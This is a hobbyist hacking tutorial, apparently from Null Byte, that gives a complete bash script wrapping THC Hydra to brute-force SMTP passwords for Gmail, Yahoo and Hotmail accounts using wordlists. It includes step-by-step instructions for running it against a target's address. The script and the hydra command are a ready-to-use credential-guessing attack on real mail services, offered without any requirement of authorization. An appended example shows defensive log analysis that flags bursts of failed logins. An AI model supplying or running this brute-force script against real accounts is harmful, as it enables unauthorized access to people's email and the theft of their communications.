How to Brute-Force Email Using a Simple Bash Script (Ft. THC Hydra)

Jun 14, 2015 06:10 PM
Jun 14, 2015 06:20 PM

Hi, my name is Alan, and I am not a script kiddy brat from Xbox Live asking you how to boot someone offline for being mean to me. I am an amateur white hat hacker hoping to learn and teach, and this is my first tutorial.

THC Hydra is a very prominent online brute-force tool and has been featured on Null Byte quite a lot. It is dictionary-based, so you have to provide a wordlist of possible passwords. You can read the README here: https://github.com/vanhauser-thc/thc-hydra

Today, we will be focusing on brute-forcing email, or more specifically, SMTP, also known as the Simple Mail Transfer Protocol. It is the standard protocol for sending electronic mail.

Let's get started!

Step 1: Open Up Kali!

Of course, we will be using Kali Linux. I use mine on VMware Workstation, but it won't really matter what you use.

Let's open up Leafpad, or the text editor of your choice.

Step 2: Bash Time!

We're going to write a short script so that we save some time instead of going through the hassle of typing out the parameters each time.

In Leafpad, type:

#! /bin/bash

echo Simple Email Cracking Script in bash

echo Written By: Alan Cao

echo NOTE: Make sure you have wordlists!

echo Let us Begin:

echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:

read smtp

echo Enter Email Address:

read email

echo Provide Directory of Wordlist for Passwords:

read wordlist

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp

Once you have typed it in, save it under any name you want, but with .sh at the end. Make sure it is in the root directory: not on your desktop, but in /root.

Now, I am going to explain how the script works.

#! /bin/bash simply means that everything in the file is run by Bash.

echo tells the computer to print something. For example, echo Hello World tells the computer to output Hello World.

read asks for user input and stores that input in a variable. read email waits for you to enter something and stores it in the variable email.

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which will help brute-force the email address. As you can tell, some of the parameters start with a $. These are the variables holding the values you entered at the read prompts.

Step 3: Permissions

We're not done yet! The file you have saved (in root, right?) only has read and write permissions. This means you cannot execute it.

Let's open up a terminal. Type in:

chmod a+x yourscript.sh (of course, replace yourscript with the name you actually gave to the Bash file)

Step 4: Execute!

Now we can finally use it!

In the terminal, let's type:

./yourscript.sh


It's working!

The script is self-explanatory. Type in the SMTP service of the target's email, where smtp.gmail.com is Gmail. After that, provide the Gmail account, such as johndoe@gmail.com, and give the path to a wordlist. You can find some default wordlists in the /usr/share/wordlists directory, or you can create your own with Crunch or CUPP. https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/
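Seen from the mail server, a dictionary run like the one above is a burst of failed SMTP logins from a single address. The following is an added example, not part of the original tutorial: it counts failed SASL logins per source address and minute and reports the ones at or above a threshold. The Postfix-style log format, the sample lines, the function names and the threshold of 5 are assumptions made for illustration.

```bash
#!/bin/bash
# Added example. The log lines are constructed, written in the syslog style
# Postfix smtpd uses for failed SASL logins (assumed format). The addresses
# come from the documentation ranges 203.0.113.0/24 and 198.51.100.0/24.
sample_log() {
cat <<'EOF'
Jun 14 18:09:40 mail postfix/smtps/smtpd[2101]: warning: unknown[198.51.100.20]: SASL LOGIN authentication failed: authentication failure
Jun 14 18:10:01 mail postfix/smtps/smtpd[2211]: connect from unknown[203.0.113.7]
Jun 14 18:10:02 mail postfix/smtps/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Jun 14 18:10:03 mail postfix/smtps/smtpd[2212]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Jun 14 18:10:03 mail postfix/smtps/smtpd[2213]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Jun 14 18:10:05 mail postfix/smtps/smtpd[2211]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Jun 14 18:10:06 mail postfix/smtps/smtpd[2212]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Jun 14 18:11:00 mail postfix/smtps/smtpd[2213]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Jun 14 18:30:12 mail postfix/smtps/smtpd[2290]: warning: unknown[198.51.100.20]: SASL LOGIN authentication failed: authentication failure
EOF
}

# flag_bruteforce LIMIT
# Reads log lines on stdin and prints "ip month day hh:mm count" for every
# source address with at least LIMIT failed SASL logins inside one minute.
flag_bruteforce() {
  awk -v limit="$1" '
    /SASL [A-Z0-9-]+ authentication failed/ {
      # The client address is the bracketed field right before ": SASL";
      # the smtpd[pid] bracket earlier in the line does not match this.
      if (match($0, /\[[0-9a-fA-F.:]+\]: SASL/)) {
        ip = substr($0, RSTART + 1, RLENGTH - 8)
        minute = $1 " " $2 " " substr($3, 1, 5)
        fails[ip " " minute]++
      }
    }
    END {
      for (k in fails)
        if (fails[k] >= limit) print k, fails[k]
    }
  ' | sort
}

# Report sources with 5 or more failures in a single minute.
sample_log | flag_bruteforce 5
```

The two failures from 198.51.100.20, twenty minutes apart, stay below the threshold, which is what separates a mistyped password from a wordlist run.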

Thanks for reading, and please provide some feedback. Ofc, this is my first How-to...
